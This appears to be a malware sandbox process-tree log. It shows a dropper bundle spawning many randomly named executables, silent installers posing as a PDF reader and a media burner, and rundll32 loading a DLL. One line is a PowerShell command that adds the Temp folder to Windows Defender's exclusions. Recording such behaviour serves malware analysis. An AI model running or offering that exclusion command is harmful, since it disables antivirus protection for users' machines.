C:\Users\Admin\Documents\byLPUH7Y9VZ6ZaOYzrX0PalP.exe"C:\Users\Admin\Documents\byLPUH7Y9VZ6ZaOYzrX0PalP.exe"2⤵PID:6384
-
-
C:\Users\Admin\Documents\eVOTv9tARrAZYICFNUvtYxta.exe"C:\Users\Admin\Documents\eVOTv9tARrAZYICFNUvtYxta.exe"2⤵PID:3112
-
-
C:\Users\Admin\Documents\qWoJEPUQoZFepcECMMnfgjtY.exe"C:\Users\Admin\Documents\qWoJEPUQoZFepcECMMnfgjtY.exe"2⤵PID:4636
-
-
C:\Users\Admin\Documents\Ry1gkoRhSPUEJYrf7wPL5v1Q.exe"C:\Users\Admin\Documents\Ry1gkoRhSPUEJYrf7wPL5v1Q.exe"2⤵PID:6624
-
-
C:\Users\Admin\Documents\dbmFJsRorcIRM2EQ4jna8LoH.exe"C:\Users\Admin\Documents\dbmFJsRorcIRM2EQ4jna8LoH.exe"2⤵PID:7132
-
-
C:\Users\Admin\Documents\Q9qLVFzVifeM9drbMel9pZlJ.exe"C:\Users\Admin\Documents\Q9qLVFzVifeM9drbMel9pZlJ.exe"2⤵PID:2408
-
-
C:\Users\Admin\Documents\BqFwoLUWEn5BcAX9sfFdB4YA.exe"C:\Users\Admin\Documents\BqFwoLUWEn5BcAX9sfFdB4YA.exe"2⤵PID:4384
-
-
C:\Users\Admin\Documents\LKdgfAcFRGLRZybmJZ0bgOOz.exe"C:\Users\Admin\Documents\LKdgfAcFRGLRZybmJZ0bgOOz.exe"2⤵PID:6348
-
-
C:\Users\Admin\Documents\t4jMzZEKSj5RkcoP92Rrq0Zm.exe"C:\Users\Admin\Documents\t4jMzZEKSj5RkcoP92Rrq0Zm.exe"2⤵PID:764
-
-
C:\Users\Admin\Documents\vZoi4yoMPCFI9K8YgM7ybW_U.exe"C:\Users\Admin\Documents\vZoi4yoMPCFI9K8YgM7ybW_U.exe"2⤵PID:6668
-
-
C:\Users\Admin\Documents\0DgbcawMG9B9YGDcwHrN0O5H.exe"C:\Users\Admin\Documents\0DgbcawMG9B9YGDcwHrN0O5H.exe"2⤵PID:6652
-
-
C:\Users\Admin\Documents\4nQDCrfpFjZSiqq7QDh0qaCd.exe"C:\Users\Admin\Documents\4nQDCrfpFjZSiqq7QDh0qaCd.exe"2⤵PID:6528
-
-
C:\Users\Admin\Documents\vWcW_Jk7uT4y2jA9NTZt5Fqr.exe"C:\Users\Admin\Documents\vWcW_Jk7uT4y2jA9NTZt5Fqr.exe"2⤵PID:6656
-
-
C:\Users\Admin\Documents\FSbQkqeJh8PybXIB5UVon9Fg.exe"C:\Users\Admin\Documents\FSbQkqeJh8PybXIB5UVon9Fg.exe"2⤵PID:4228
-
-
C:\Users\Admin\Documents\y4J1ITCLmcIrb1EAVxlLHoRC.exe"C:\Users\Admin\Documents\y4J1ITCLmcIrb1EAVxlLHoRC.exe"2⤵PID:6632
-
-
C:\Users\Admin\Documents\fioqQ_cJlXNPJbHINCOyZvac.exe"C:\Users\Admin\Documents\fioqQ_cJlXNPJbHINCOyZvac.exe"2⤵PID:6628
-
-
C:\Users\Admin\Documents\sqjxSyvBpP8BCjd0XD0v3jWs.exe"C:\Users\Admin\Documents\sqjxSyvBpP8BCjd0XD0v3jWs.exe"2⤵PID:6448
-
-
C:\Users\Admin\Documents\rah8JUXP1AIWdTN5SZ4DcPBT.exe"C:\Users\Admin\Documents\rah8JUXP1AIWdTN5SZ4DcPBT.exe"2⤵PID:6404
-
-
C:\Users\Admin\Documents\lN15CmBsWNig_OqzMkf2wNRq.exe"C:\Users\Admin\Documents\lN15CmBsWNig_OqzMkf2wNRq.exe"2⤵PID:7252
-
-
C:\Users\Admin\Documents\Ms7wUdnIvmrfC1WuchPK8ksU.exe"C:\Users\Admin\Documents\Ms7wUdnIvmrfC1WuchPK8ksU.exe"2⤵PID:7244
-
-
C:\Users\Admin\Documents\zHmIharUsYC9zIvr479HBrc7.exe"C:\Users\Admin\Documents\zHmIharUsYC9zIvr479HBrc7.exe"2⤵PID:6028
-
-
C:\Users\Admin\Documents\X8owNSYlV9ZD5TdTKP3HMBSI.exe"C:\Users\Admin\Documents\X8owNSYlV9ZD5TdTKP3HMBSI.exe"2⤵PID:7100
-
-
C:\Users\Admin\Documents\xgS9ylAVVlPJSp2oltOqWktE.exe"C:\Users\Admin\Documents\xgS9ylAVVlPJSp2oltOqWktE.exe"2⤵PID:5084
-
-
C:\Users\Admin\Documents\Ed29pdE4CC6XOk2qnh1LE6z8.exe"C:\Users\Admin\Documents\Ed29pdE4CC6XOk2qnh1LE6z8.exe"2⤵PID:7360
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118c8b4c3885d897d.exeThu118c8b4c3885d897d.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118c8b4c3885d897d.exeC:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118c8b4c3885d897d.exe2⤵PID:3916
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118c8b4c3885d897d.exeC:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118c8b4c3885d897d.exe2⤵PID:4116
-
-
C:\Users\Admin\AppData\Local\Temp\is-9E5BB.tmp\Thu11b9fee5fd5b3c.tmp"C:\Users\Admin\AppData\Local\Temp\is-9E5BB.tmp\Thu11b9fee5fd5b3c.tmp" /SL5="$80062,138429,56832,C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11b9fee5fd5b3c.exe"1⤵PID:596
-
C:\Users\Admin\AppData\Local\Temp\is-R61O7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-R61O7.tmp\Setup.exe" /Verysilent2⤵PID:5232
-
C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"C:\Program Files (x86)\PDF Reader\PDF Reader\Setup.exe"3⤵PID:4520
-
C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"C:\Users\Admin\AppData\Local\Temp\sampason12345.exe"4⤵PID:5680
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-2021I.tmp\Thu112e5981b78.tmp"C:\Users\Admin\AppData\Local\Temp\is-2021I.tmp\Thu112e5981b78.tmp" /SL5="$60060,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu112e5981b78.exe"1⤵PID:684
-
C:\Users\Admin\AppData\Local\Temp\is-PE9NP.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-PE9NP.tmp\___YHDG34.exe" /S /UID=burnerch22⤵PID:3424
-
C:\Program Files\Internet Explorer\YQDYRIDGLO\ultramediaburner.exe"C:\Program Files\Internet Explorer\YQDYRIDGLO\ultramediaburner.exe" /VERYSILENT3⤵PID:6816
-
C:\Users\Admin\AppData\Local\Temp\is-4C1IA.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4C1IA.tmp\ultramediaburner.tmp" /SL5="$501CE,281924,62464,C:\Program Files\Internet Explorer\YQDYRIDGLO\ultramediaburner.exe" /VERYSILENT4⤵PID:6876
-
-
-
C:\Users\Admin\AppData\Local\Temp\8b-02fb2-448-dd487-09aff9a4e0877\Luhiwaezhaxae.exe"C:\Users\Admin\AppData\Local\Temp\8b-02fb2-448-dd487-09aff9a4e0877\Luhiwaezhaxae.exe"3⤵PID:7012
-
-
C:\Users\Admin\AppData\Local\Temp\32-d5b91-e20-06195-0b72a31da9ed6\Besagovucae.exe"C:\Users\Admin\AppData\Local\Temp\32-d5b91-e20-06195-0b72a31da9ed6\Besagovucae.exe"3⤵PID:7120
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu112e5981b78.exeThu112e5981b78.exe1⤵
- Executes dropped EXE
PID:4780
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵PID:3760
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5744 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5836
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:6112